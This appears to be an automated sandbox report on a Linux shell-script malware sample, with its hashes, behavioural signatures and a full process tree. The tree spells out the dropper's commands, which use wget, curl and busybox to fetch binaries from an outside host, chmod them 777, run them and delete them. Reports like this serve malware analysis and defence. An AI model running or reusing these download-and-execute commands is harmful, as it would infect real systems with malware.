Analysis
- max time kernel: 80s
- max time network: 79s
- platform: debian-9_mipsel
- resource: debian9-mipsel-20240611-en
- resource tags: arch:mipsel, image:debian9-mipsel-20240611-en, kernel:4.9.0-13-4kc-malta, locale:en-us, os:debian-9-mipsel, system
- submitted: 28/10/2024, 01:45
- Static task static1
- Behavioral task behavioral1: sample 68542373ab9f41042ce0859952b5e7466b60624a417b1da7968230cad9001617.sh, resource ubuntu1804-amd64-20240611-en
- Behavioral task behavioral2: sample 68542373ab9f41042ce0859952b5e7466b60624a417b1da7968230cad9001617.sh, resource debian9-armhf-20240611-en
- Behavioral task behavioral3: sample 68542373ab9f41042ce0859952b5e7466b60624a417b1da7968230cad9001617.sh, resource debian9-mipsbe-20240611-en
- Behavioral task behavioral4: sample 68542373ab9f41042ce0859952b5e7466b60624a417b1da7968230cad9001617.sh, resource debian9-mipsel-20240611-en
General
- Target: 68542373ab9f41042ce0859952b5e7466b60624a417b1da7968230cad9001617.sh
- Size: 10KB
- MD5: cd798da264eea2cb34f14ab849c4c0e3
- SHA1: f8107efcd9299b6364ce3648717b2ecc577cc05a
- SHA256: 68542373ab9f41042ce0859952b5e7466b60624a417b1da7968230cad9001617
- SHA512: 886db5cb7ff8566ea8507ce0cb56df8dc2dd51d8a5e7ac27a67d2a19da607232b90918a184ceb91dafc01fdecdfa552185580c40db363b5fa153849afda32cdc
- SSDEEP: 192:G3T4hJ8AQ4mPmfmympmFm8/bfTUJhdWA3T4hJFfTUJh3mPmfmympmFm8o:uAQJeO3kY8/YW9eO3kY8o
Malware Config
Signatures
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Executes dropped EXE 28 IoCs
Reads runtime system information
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl (the same entry is recorded once per curl process)
System Network Configuration Discovery 1 TTPs 64 IoCs
Adversaries may gather information about the network configuration of a system.
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
Each entry is listed as executable path: command line (PID) [signatures triggered]; indentation shows the parent/child relationship.

- /tmp/68542373ab9f41042ce0859952b5e7466b60624a417b1da7968230cad9001617.sh: /tmp/68542373ab9f41042ce0859952b5e7466b60624a417b1da7968230cad9001617.sh (PID 708)
  - /bin/rm: /bin/rm bins.sh (PID 713)
  - /usr/bin/wget: wget http://conn.masjesu.zip/bins/xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw (PID 717) [System Network Configuration Discovery]
  - /usr/bin/curl: curl -O http://conn.masjesu.zip/bins/xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw (PID 730) [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
  - /bin/busybox: /bin/busybox wget http://conn.masjesu.zip/bins/xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw (PID 756) [System Network Configuration Discovery]
  - /bin/chmod: chmod 777 xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw (PID 764) [File and Directory Permissions Modification]
  - /tmp/xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw: ./xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw (PID 765) [Executes dropped EXE]
  - /bin/rm: rm xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw (PID 768)
  - /usr/bin/wget: wget http://conn.masjesu.zip/bins/fBl2KigufHZnmQqWghZFomThmvhAVfHNsF (PID 770)
  - /usr/bin/curl: curl -O http://conn.masjesu.zip/bins/fBl2KigufHZnmQqWghZFomThmvhAVfHNsF (PID 789) [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
  - /bin/busybox: /bin/busybox wget http://conn.masjesu.zip/bins/fBl2KigufHZnmQqWghZFomThmvhAVfHNsF (PID 791)
  - /bin/chmod: chmod 777 fBl2KigufHZnmQqWghZFomThmvhAVfHNsF (PID 792) [File and Directory Permissions Modification]
  - /tmp/fBl2KigufHZnmQqWghZFomThmvhAVfHNsF: ./fBl2KigufHZnmQqWghZFomThmvhAVfHNsF (PID 793) [Executes dropped EXE]
  - /bin/rm: rm fBl2KigufHZnmQqWghZFomThmvhAVfHNsF (PID 794)
  - /usr/bin/wget: wget http://conn.masjesu.zip/bins/9ekUy3pPFLPyGLw2h6RfxlOZRK2qt1lZFB (PID 795) [System Network Configuration Discovery]
  - /usr/bin/curl: curl -O http://conn.masjesu.zip/bins/9ekUy3pPFLPyGLw2h6RfxlOZRK2qt1lZFB (PID 796) [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
  - /bin/busybox: /bin/busybox wget http://conn.masjesu.zip/bins/9ekUy3pPFLPyGLw2h6RfxlOZRK2qt1lZFB (PID 798) [System Network Configuration Discovery]
  - /bin/chmod: chmod 777 9ekUy3pPFLPyGLw2h6RfxlOZRK2qt1lZFB (PID 799) [File and Directory Permissions Modification]
  - /tmp/9ekUy3pPFLPyGLw2h6RfxlOZRK2qt1lZFB: ./9ekUy3pPFLPyGLw2h6RfxlOZRK2qt1lZFB (PID 800) [Executes dropped EXE]
  - /bin/rm: rm 9ekUy3pPFLPyGLw2h6RfxlOZRK2qt1lZFB (PID 801)
  - /usr/bin/wget: wget http://conn.masjesu.zip/bins/jRM4slh846TuCfMSUvIaQLCg29n4oFbP3o (PID 802) [System Network Configuration Discovery]
  - /usr/bin/curl: curl -O http://conn.masjesu.zip/bins/jRM4slh846TuCfMSUvIaQLCg29n4oFbP3o (PID 806) [Reads runtime system information; Writes file to tmp directory]
  - /bin/busybox: /bin/busybox wget http://conn.masjesu.zip/bins/jRM4slh846TuCfMSUvIaQLCg29n4oFbP3o (PID 819) [System Network Configuration Discovery]
  - /bin/chmod: chmod 777 jRM4slh846TuCfMSUvIaQLCg29n4oFbP3o (PID 825) [File and Directory Permissions Modification]
  - /tmp/jRM4slh846TuCfMSUvIaQLCg29n4oFbP3o: ./jRM4slh846TuCfMSUvIaQLCg29n4oFbP3o (PID 826) [Executes dropped EXE]
  - /bin/rm: rm jRM4slh846TuCfMSUvIaQLCg29n4oFbP3o (PID 829)
  - /usr/bin/wget: wget http://conn.masjesu.zip/bins/L3L3AWJWz1jZhxSYZHCvA9q8LdsOc9rGey (PID 831) [System Network Configuration Discovery]
  - /usr/bin/curl: curl -O http://conn.masjesu.zip/bins/L3L3AWJWz1jZhxSYZHCvA9q8LdsOc9rGey (PID 834) [Reads runtime system information; Writes file to tmp directory]
  - /bin/busybox: /bin/busybox wget http://conn.masjesu.zip/bins/L3L3AWJWz1jZhxSYZHCvA9q8LdsOc9rGey (PID 842)
  - /bin/chmod: chmod 777 L3L3AWJWz1jZhxSYZHCvA9q8LdsOc9rGey (PID 843) [File and Directory Permissions Modification]
  - /tmp/L3L3AWJWz1jZhxSYZHCvA9q8LdsOc9rGey: ./L3L3AWJWz1jZhxSYZHCvA9q8LdsOc9rGey (PID 844) [Executes dropped EXE]
  - /bin/rm: rm L3L3AWJWz1jZhxSYZHCvA9q8LdsOc9rGey (PID 845)
  - /usr/bin/wget: wget http://conn.masjesu.zip/bins/vlBRkxc2pXZfCqjxBIXpWIdWRcl8qgnFod (PID 846) [System Network Configuration Discovery]
  - /usr/bin/curl: curl -O http://conn.masjesu.zip/bins/vlBRkxc2pXZfCqjxBIXpWIdWRcl8qgnFod (PID 847) [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
  - /bin/busybox: /bin/busybox wget http://conn.masjesu.zip/bins/vlBRkxc2pXZfCqjxBIXpWIdWRcl8qgnFod (PID 852) [System Network Configuration Discovery]
  - /bin/chmod: chmod 777 vlBRkxc2pXZfCqjxBIXpWIdWRcl8qgnFod (PID 853) [File and Directory Permissions Modification]
  - /tmp/vlBRkxc2pXZfCqjxBIXpWIdWRcl8qgnFod: ./vlBRkxc2pXZfCqjxBIXpWIdWRcl8qgnFod (PID 854) [Executes dropped EXE]
  - /bin/rm: rm vlBRkxc2pXZfCqjxBIXpWIdWRcl8qgnFod (PID 855)
  - /usr/bin/wget: wget http://conn.masjesu.zip/bins/5ZJMWA4qvJDnVJiAuQPlROzRn70kAg8FpG (PID 856) [System Network Configuration Discovery]
  - /usr/bin/curl: curl -O http://conn.masjesu.zip/bins/5ZJMWA4qvJDnVJiAuQPlROzRn70kAg8FpG (PID 857) [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
  - /bin/busybox: /bin/busybox wget http://conn.masjesu.zip/bins/5ZJMWA4qvJDnVJiAuQPlROzRn70kAg8FpG (PID 859) [System Network Configuration Discovery]
  - /bin/chmod: chmod 777 5ZJMWA4qvJDnVJiAuQPlROzRn70kAg8FpG (PID 860) [File and Directory Permissions Modification]
  - /tmp/5ZJMWA4qvJDnVJiAuQPlROzRn70kAg8FpG: ./5ZJMWA4qvJDnVJiAuQPlROzRn70kAg8FpG (PID 861) [Executes dropped EXE]
  - /bin/rm: rm 5ZJMWA4qvJDnVJiAuQPlROzRn70kAg8FpG (PID 862)
  - /usr/bin/wget: wget http://conn.masjesu.zip/bins/2ffYLp5CKNrI7Xt5HXl6mWqJj4hneNkta4 (PID 863) [System Network Configuration Discovery]
  - /usr/bin/curl: curl -O http://conn.masjesu.zip/bins/2ffYLp5CKNrI7Xt5HXl6mWqJj4hneNkta4 (PID 864) [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
  - /bin/busybox: /bin/busybox wget http://conn.masjesu.zip/bins/2ffYLp5CKNrI7Xt5HXl6mWqJj4hneNkta4 (PID 866) [System Network Configuration Discovery]
  - /bin/chmod: chmod 777 2ffYLp5CKNrI7Xt5HXl6mWqJj4hneNkta4 (PID 867) [File and Directory Permissions Modification]
  - /tmp/2ffYLp5CKNrI7Xt5HXl6mWqJj4hneNkta4: ./2ffYLp5CKNrI7Xt5HXl6mWqJj4hneNkta4 (PID 868) [Executes dropped EXE]
  - /bin/rm: rm 2ffYLp5CKNrI7Xt5HXl6mWqJj4hneNkta4 (PID 869)
  - /usr/bin/wget: wget http://conn.masjesu.zip/bins/qkWlgSeyWC2V2IsRcOXMQJnDkM0rWsXBQq (PID 870)
  - /usr/bin/curl: curl -O http://conn.masjesu.zip/bins/qkWlgSeyWC2V2IsRcOXMQJnDkM0rWsXBQq (PID 871) [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
  - /bin/busybox: /bin/busybox wget http://conn.masjesu.zip/bins/qkWlgSeyWC2V2IsRcOXMQJnDkM0rWsXBQq (PID 873) [System Network Configuration Discovery]
  - /bin/chmod: chmod 777 qkWlgSeyWC2V2IsRcOXMQJnDkM0rWsXBQq (PID 874) [File and Directory Permissions Modification]
  - /tmp/qkWlgSeyWC2V2IsRcOXMQJnDkM0rWsXBQq: ./qkWlgSeyWC2V2IsRcOXMQJnDkM0rWsXBQq (PID 875) [Executes dropped EXE]
  - /bin/rm: rm qkWlgSeyWC2V2IsRcOXMQJnDkM0rWsXBQq (PID 876)
  - /usr/bin/wget: wget http://conn.masjesu.zip/bins/SDrKCJtYQfPpcBO9zir4tVbwwn8j2iJ4ca (PID 877) [System Network Configuration Discovery]
  - /usr/bin/curl: curl -O http://conn.masjesu.zip/bins/SDrKCJtYQfPpcBO9zir4tVbwwn8j2iJ4ca (PID 878) [Reads runtime system information; Writes file to tmp directory]
  - /bin/busybox: /bin/busybox wget http://conn.masjesu.zip/bins/SDrKCJtYQfPpcBO9zir4tVbwwn8j2iJ4ca (PID 880) [System Network Configuration Discovery]
  - /bin/chmod: chmod 777 SDrKCJtYQfPpcBO9zir4tVbwwn8j2iJ4ca (PID 881) [File and Directory Permissions Modification]
  - /tmp/SDrKCJtYQfPpcBO9zir4tVbwwn8j2iJ4ca: ./SDrKCJtYQfPpcBO9zir4tVbwwn8j2iJ4ca (PID 882) [Executes dropped EXE]
  - /bin/rm: rm SDrKCJtYQfPpcBO9zir4tVbwwn8j2iJ4ca (PID 883)
  - /usr/bin/wget: wget http://conn.masjesu.zip/bins/ZrOu6tdk58CseIasnHvicT7lv5b5p3J0lp (PID 884) [System Network Configuration Discovery]
  - /usr/bin/curl: curl -O http://conn.masjesu.zip/bins/ZrOu6tdk58CseIasnHvicT7lv5b5p3J0lp (PID 885) [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
  - /bin/busybox: /bin/busybox wget http://conn.masjesu.zip/bins/ZrOu6tdk58CseIasnHvicT7lv5b5p3J0lp (PID 887)
  - /bin/chmod: chmod 777 ZrOu6tdk58CseIasnHvicT7lv5b5p3J0lp (PID 888) [File and Directory Permissions Modification]
  - /tmp/ZrOu6tdk58CseIasnHvicT7lv5b5p3J0lp: ./ZrOu6tdk58CseIasnHvicT7lv5b5p3J0lp (PID 889) [Executes dropped EXE]
  - /bin/rm: rm ZrOu6tdk58CseIasnHvicT7lv5b5p3J0lp (PID 890)
  - /usr/bin/wget: wget http://conn.masjesu.zip/bins/IJEzh1uTvmlhGMzNEEJLk7CpaJwvhMUl3n (PID 891) [System Network Configuration Discovery]
  - /usr/bin/curl: curl -O http://conn.masjesu.zip/bins/IJEzh1uTvmlhGMzNEEJLk7CpaJwvhMUl3n (PID 892) [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
  - /bin/busybox: /bin/busybox wget http://conn.masjesu.zip/bins/IJEzh1uTvmlhGMzNEEJLk7CpaJwvhMUl3n (PID 894) [System Network Configuration Discovery]
  - /bin/chmod: chmod 777 IJEzh1uTvmlhGMzNEEJLk7CpaJwvhMUl3n (PID 895) [File and Directory Permissions Modification]
  - /tmp/IJEzh1uTvmlhGMzNEEJLk7CpaJwvhMUl3n: ./IJEzh1uTvmlhGMzNEEJLk7CpaJwvhMUl3n (PID 896) [Executes dropped EXE]
  - /bin/rm: rm IJEzh1uTvmlhGMzNEEJLk7CpaJwvhMUl3n (PID 897)
  - /usr/bin/wget: wget http://conn.masjesu.zip/bins/YQzjeqdjPWW0X4OgsHKCnzGh5JEljgdNWL (PID 898)
  - /usr/bin/curl: curl -O http://conn.masjesu.zip/bins/YQzjeqdjPWW0X4OgsHKCnzGh5JEljgdNWL (PID 899) [Reads runtime system information; Writes file to tmp directory]
  - /bin/busybox: /bin/busybox wget http://conn.masjesu.zip/bins/YQzjeqdjPWW0X4OgsHKCnzGh5JEljgdNWL (PID 901) [System Network Configuration Discovery]
  - /bin/chmod: chmod 777 YQzjeqdjPWW0X4OgsHKCnzGh5JEljgdNWL (PID 902) [File and Directory Permissions Modification]
  - /tmp/YQzjeqdjPWW0X4OgsHKCnzGh5JEljgdNWL: ./YQzjeqdjPWW0X4OgsHKCnzGh5JEljgdNWL (PID 903) [Executes dropped EXE]
  - /bin/rm: rm YQzjeqdjPWW0X4OgsHKCnzGh5JEljgdNWL (PID 904)
  - /usr/bin/wget: wget http://conn.masjesu.zip/bins/BoL8zZfA0u5ENOdqorecUs1vqQakkbJsBz (PID 905) [System Network Configuration Discovery]
  - /usr/bin/curl: curl -O http://conn.masjesu.zip/bins/BoL8zZfA0u5ENOdqorecUs1vqQakkbJsBz (PID 906) [Reads runtime system information; Writes file to tmp directory]
  - /bin/busybox: /bin/busybox wget http://conn.masjesu.zip/bins/BoL8zZfA0u5ENOdqorecUs1vqQakkbJsBz (PID 908) [System Network Configuration Discovery]
  - /bin/chmod: chmod 777 BoL8zZfA0u5ENOdqorecUs1vqQakkbJsBz (PID 909) [File and Directory Permissions Modification]
  - /tmp/BoL8zZfA0u5ENOdqorecUs1vqQakkbJsBz: ./BoL8zZfA0u5ENOdqorecUs1vqQakkbJsBz (PID 910) [Executes dropped EXE]
  - /bin/rm: rm BoL8zZfA0u5ENOdqorecUs1vqQakkbJsBz (PID 911)
  - /usr/bin/wget: wget http://conn.masjesu.zip/bins/ZrOu6tdk58CseIasnHvicT7lv5b5p3J0lp (PID 912) [System Network Configuration Discovery]
  - /usr/bin/curl: curl -O http://conn.masjesu.zip/bins/ZrOu6tdk58CseIasnHvicT7lv5b5p3J0lp (PID 913) [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
  - /bin/busybox: /bin/busybox wget http://conn.masjesu.zip/bins/ZrOu6tdk58CseIasnHvicT7lv5b5p3J0lp (PID 915)
  - /bin/chmod: chmod 777 ZrOu6tdk58CseIasnHvicT7lv5b5p3J0lp (PID 916) [File and Directory Permissions Modification]
  - /tmp/ZrOu6tdk58CseIasnHvicT7lv5b5p3J0lp: ./ZrOu6tdk58CseIasnHvicT7lv5b5p3J0lp (PID 917) [Executes dropped EXE]
  - /bin/rm: rm ZrOu6tdk58CseIasnHvicT7lv5b5p3J0lp (PID 918)
  - /usr/bin/wget: wget http://conn.masjesu.zip/bins/IJEzh1uTvmlhGMzNEEJLk7CpaJwvhMUl3n (PID 919) [System Network Configuration Discovery]
  - /usr/bin/curl: curl -O http://conn.masjesu.zip/bins/IJEzh1uTvmlhGMzNEEJLk7CpaJwvhMUl3n (PID 920) [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
  - /bin/busybox: /bin/busybox wget http://conn.masjesu.zip/bins/IJEzh1uTvmlhGMzNEEJLk7CpaJwvhMUl3n (PID 922) [System Network Configuration Discovery]
  - /bin/chmod: chmod 777 IJEzh1uTvmlhGMzNEEJLk7CpaJwvhMUl3n (PID 923) [File and Directory Permissions Modification]
  - /tmp/IJEzh1uTvmlhGMzNEEJLk7CpaJwvhMUl3n: ./IJEzh1uTvmlhGMzNEEJLk7CpaJwvhMUl3n (PID 924) [Executes dropped EXE]
  - /bin/rm: rm IJEzh1uTvmlhGMzNEEJLk7CpaJwvhMUl3n (PID 925)
  - /usr/bin/wget: wget http://conn.masjesu.zip/bins/YQzjeqdjPWW0X4OgsHKCnzGh5JEljgdNWL (PID 926) [System Network Configuration Discovery]
  - /usr/bin/curl: curl -O http://conn.masjesu.zip/bins/YQzjeqdjPWW0X4OgsHKCnzGh5JEljgdNWL (PID 927) [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
  - /bin/busybox: /bin/busybox wget http://conn.masjesu.zip/bins/YQzjeqdjPWW0X4OgsHKCnzGh5JEljgdNWL (PID 929)
  - /bin/chmod: chmod 777 YQzjeqdjPWW0X4OgsHKCnzGh5JEljgdNWL (PID 930) [File and Directory Permissions Modification]
  - /tmp/YQzjeqdjPWW0X4OgsHKCnzGh5JEljgdNWL: ./YQzjeqdjPWW0X4OgsHKCnzGh5JEljgdNWL (PID 931) [Executes dropped EXE]
  - /bin/rm: rm YQzjeqdjPWW0X4OgsHKCnzGh5JEljgdNWL (PID 932)
  - /usr/bin/wget: wget http://conn.masjesu.zip/bins/BoL8zZfA0u5ENOdqorecUs1vqQakkbJsBz (PID 933) [System Network Configuration Discovery]
  - /usr/bin/curl: curl -O http://conn.masjesu.zip/bins/BoL8zZfA0u5ENOdqorecUs1vqQakkbJsBz (PID 934) [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
  - /bin/busybox: /bin/busybox wget http://conn.masjesu.zip/bins/BoL8zZfA0u5ENOdqorecUs1vqQakkbJsBz (PID 936) [System Network Configuration Discovery]
  - /bin/chmod: chmod 777 BoL8zZfA0u5ENOdqorecUs1vqQakkbJsBz (PID 937) [File and Directory Permissions Modification]
  - /tmp/BoL8zZfA0u5ENOdqorecUs1vqQakkbJsBz: ./BoL8zZfA0u5ENOdqorecUs1vqQakkbJsBz (PID 938) [Executes dropped EXE]
  - /bin/rm: rm BoL8zZfA0u5ENOdqorecUs1vqQakkbJsBz (PID 939)
  - /usr/bin/wget: wget http://conn.masjesu.zip/bins/jRM4slh846TuCfMSUvIaQLCg29n4oFbP3o (PID 940) [System Network Configuration Discovery]
  - /usr/bin/curl: curl -O http://conn.masjesu.zip/bins/jRM4slh846TuCfMSUvIaQLCg29n4oFbP3o (PID 941) [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
  - /bin/busybox: /bin/busybox wget http://conn.masjesu.zip/bins/jRM4slh846TuCfMSUvIaQLCg29n4oFbP3o (PID 943) [System Network Configuration Discovery]
  - /bin/chmod: chmod 777 jRM4slh846TuCfMSUvIaQLCg29n4oFbP3o (PID 944) [File and Directory Permissions Modification]
  - /tmp/jRM4slh846TuCfMSUvIaQLCg29n4oFbP3o: ./jRM4slh846TuCfMSUvIaQLCg29n4oFbP3o (PID 945) [Executes dropped EXE]
  - /bin/rm: rm jRM4slh846TuCfMSUvIaQLCg29n4oFbP3o (PID 946)
  - /usr/bin/wget: wget http://conn.masjesu.zip/bins/xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw (PID 947) [System Network Configuration Discovery]
  - /usr/bin/curl: curl -O http://conn.masjesu.zip/bins/xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw (PID 948) [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
  - /bin/busybox: /bin/busybox wget http://conn.masjesu.zip/bins/xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw (PID 950) [System Network Configuration Discovery]
  - /bin/chmod: chmod 777 xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw (PID 951) [File and Directory Permissions Modification]
  - /tmp/xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw: ./xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw (PID 952) [Executes dropped EXE]
  - /bin/rm: rm xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw (PID 953)
  - /usr/bin/wget: wget http://conn.masjesu.zip/bins/fBl2KigufHZnmQqWghZFomThmvhAVfHNsF (PID 954) [System Network Configuration Discovery]
  - /usr/bin/curl: curl -O http://conn.masjesu.zip/bins/fBl2KigufHZnmQqWghZFomThmvhAVfHNsF (PID 955) [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
  - /bin/busybox: /bin/busybox wget http://conn.masjesu.zip/bins/fBl2KigufHZnmQqWghZFomThmvhAVfHNsF (PID 957) [System Network Configuration Discovery]
  - /bin/chmod: chmod 777 fBl2KigufHZnmQqWghZFomThmvhAVfHNsF (PID 958) [File and Directory Permissions Modification]
  - /tmp/fBl2KigufHZnmQqWghZFomThmvhAVfHNsF: ./fBl2KigufHZnmQqWghZFomThmvhAVfHNsF (PID 959) [Executes dropped EXE]
  - /bin/rm: rm fBl2KigufHZnmQqWghZFomThmvhAVfHNsF (PID 960)
  - /usr/bin/wget: wget http://conn.masjesu.zip/bins/9ekUy3pPFLPyGLw2h6RfxlOZRK2qt1lZFB (PID 961)
  - /usr/bin/curl: curl -O http://conn.masjesu.zip/bins/9ekUy3pPFLPyGLw2h6RfxlOZRK2qt1lZFB (PID 962) [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
  - /bin/busybox: /bin/busybox wget http://conn.masjesu.zip/bins/9ekUy3pPFLPyGLw2h6RfxlOZRK2qt1lZFB (PID 964) [System Network Configuration Discovery]
  - /bin/chmod: chmod 777 9ekUy3pPFLPyGLw2h6RfxlOZRK2qt1lZFB (PID 965) [File and Directory Permissions Modification]
  - /tmp/9ekUy3pPFLPyGLw2h6RfxlOZRK2qt1lZFB: ./9ekUy3pPFLPyGLw2h6RfxlOZRK2qt1lZFB (PID 966) [Executes dropped EXE]
  - /bin/rm: rm 9ekUy3pPFLPyGLw2h6RfxlOZRK2qt1lZFB (PID 967)
  - /usr/bin/wget: wget http://conn.masjesu.zip/bins/SDrKCJtYQfPpcBO9zir4tVbwwn8j2iJ4ca (PID 968)
  - /usr/bin/curl: curl -O http://conn.masjesu.zip/bins/SDrKCJtYQfPpcBO9zir4tVbwwn8j2iJ4ca (PID 969) [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
  - /bin/busybox: /bin/busybox wget http://conn.masjesu.zip/bins/SDrKCJtYQfPpcBO9zir4tVbwwn8j2iJ4ca (PID 971) [System Network Configuration Discovery]
  - /bin/chmod: chmod 777 SDrKCJtYQfPpcBO9zir4tVbwwn8j2iJ4ca (PID 972) [File and Directory Permissions Modification]
  - /tmp/SDrKCJtYQfPpcBO9zir4tVbwwn8j2iJ4ca: ./SDrKCJtYQfPpcBO9zir4tVbwwn8j2iJ4ca (PID 973) [Executes dropped EXE]
  - /bin/rm: rm SDrKCJtYQfPpcBO9zir4tVbwwn8j2iJ4ca (PID 974)
  - /usr/bin/wget: wget http://conn.masjesu.zip/bins/L3L3AWJWz1jZhxSYZHCvA9q8LdsOc9rGey (PID 975)
  - /usr/bin/curl: curl -O http://conn.masjesu.zip/bins/L3L3AWJWz1jZhxSYZHCvA9q8LdsOc9rGey (PID 976) [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
  - /bin/busybox: /bin/busybox wget http://conn.masjesu.zip/bins/L3L3AWJWz1jZhxSYZHCvA9q8LdsOc9rGey (PID 978) [System Network Configuration Discovery]
  - /bin/chmod: chmod 777 L3L3AWJWz1jZhxSYZHCvA9q8LdsOc9rGey (PID 979) [File and Directory Permissions Modification]
  - /tmp/L3L3AWJWz1jZhxSYZHCvA9q8LdsOc9rGey: ./L3L3AWJWz1jZhxSYZHCvA9q8LdsOc9rGey (PID 980) [Executes dropped EXE]
  - /bin/rm: rm L3L3AWJWz1jZhxSYZHCvA9q8LdsOc9rGey (PID 981)
  - /usr/bin/wget: wget http://conn.masjesu.zip/bins/vlBRkxc2pXZfCqjxBIXpWIdWRcl8qgnFod (PID 982) [System Network Configuration Discovery]
  - /usr/bin/curl: curl -O http://conn.masjesu.zip/bins/vlBRkxc2pXZfCqjxBIXpWIdWRcl8qgnFod (PID 983) [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
  - /bin/busybox: /bin/busybox wget http://conn.masjesu.zip/bins/vlBRkxc2pXZfCqjxBIXpWIdWRcl8qgnFod (PID 985) [System Network Configuration Discovery]
  - /bin/chmod: chmod 777 vlBRkxc2pXZfCqjxBIXpWIdWRcl8qgnFod (PID 986) [File and Directory Permissions Modification]
  - /tmp/vlBRkxc2pXZfCqjxBIXpWIdWRcl8qgnFod: ./vlBRkxc2pXZfCqjxBIXpWIdWRcl8qgnFod (PID 987) [Executes dropped EXE]
  - /bin/rm: rm vlBRkxc2pXZfCqjxBIXpWIdWRcl8qgnFod (PID 988)
  - /usr/bin/wget: wget http://conn.masjesu.zip/bins/5ZJMWA4qvJDnVJiAuQPlROzRn70kAg8FpG (PID 989)
  - /usr/bin/curl: curl -O http://conn.masjesu.zip/bins/5ZJMWA4qvJDnVJiAuQPlROzRn70kAg8FpG (PID 990) [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
  - /bin/busybox: /bin/busybox wget http://conn.masjesu.zip/bins/5ZJMWA4qvJDnVJiAuQPlROzRn70kAg8FpG (PID 992)
  - /bin/chmod: chmod 777 5ZJMWA4qvJDnVJiAuQPlROzRn70kAg8FpG (PID 993) [File and Directory Permissions Modification]
  - /tmp/5ZJMWA4qvJDnVJiAuQPlROzRn70kAg8FpG: ./5ZJMWA4qvJDnVJiAuQPlROzRn70kAg8FpG (PID 994) [Executes dropped EXE]
  - /bin/rm: rm 5ZJMWA4qvJDnVJiAuQPlROzRn70kAg8FpG (PID 995)
  - /usr/bin/wget: wget http://conn.masjesu.zip/bins/2ffYLp5CKNrI7Xt5HXl6mWqJj4hneNkta4 (PID 996) [System Network Configuration Discovery]
  - /usr/bin/curl: curl -O http://conn.masjesu.zip/bins/2ffYLp5CKNrI7Xt5HXl6mWqJj4hneNkta4 (PID 997) [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
  - /bin/busybox: /bin/busybox wget http://conn.masjesu.zip/bins/2ffYLp5CKNrI7Xt5HXl6mWqJj4hneNkta4 (PID 999) [System Network Configuration Discovery]
  - /bin/chmod: chmod 777 2ffYLp5CKNrI7Xt5HXl6mWqJj4hneNkta4 (PID 1000) [File and Directory Permissions Modification]
  - /tmp/2ffYLp5CKNrI7Xt5HXl6mWqJj4hneNkta4: ./2ffYLp5CKNrI7Xt5HXl6mWqJj4hneNkta4 (PID 1001) [Executes dropped EXE]
  - /bin/rm: rm 2ffYLp5CKNrI7Xt5HXl6mWqJj4hneNkta4 (PID 1002)
  - /usr/bin/wget: wget http://conn.masjesu.zip/bins/qkWlgSeyWC2V2IsRcOXMQJnDkM0rWsXBQq (PID 1003)
  - /usr/bin/curl: curl -O http://conn.masjesu.zip/bins/qkWlgSeyWC2V2IsRcOXMQJnDkM0rWsXBQq (PID 1004) [Reads runtime system information; Writes file to tmp directory]
  - /bin/busybox: /bin/busybox wget http://conn.masjesu.zip/bins/qkWlgSeyWC2V2IsRcOXMQJnDkM0rWsXBQq (PID 1006) [System Network Configuration Discovery]
  - /bin/chmod: chmod 777 qkWlgSeyWC2V2IsRcOXMQJnDkM0rWsXBQq (PID 1007) [File and Directory Permissions Modification]
  - /tmp/qkWlgSeyWC2V2IsRcOXMQJnDkM0rWsXBQq: ./qkWlgSeyWC2V2IsRcOXMQJnDkM0rWsXBQq (PID 1008) [Executes dropped EXE]
  - /bin/rm: rm qkWlgSeyWC2V2IsRcOXMQJnDkM0rWsXBQq (PID 1009)
Network
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 153B
- MD5: 998368d7c95ea4293237f2320546e440
- SHA1: 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
- SHA256: 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
- SHA512: 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97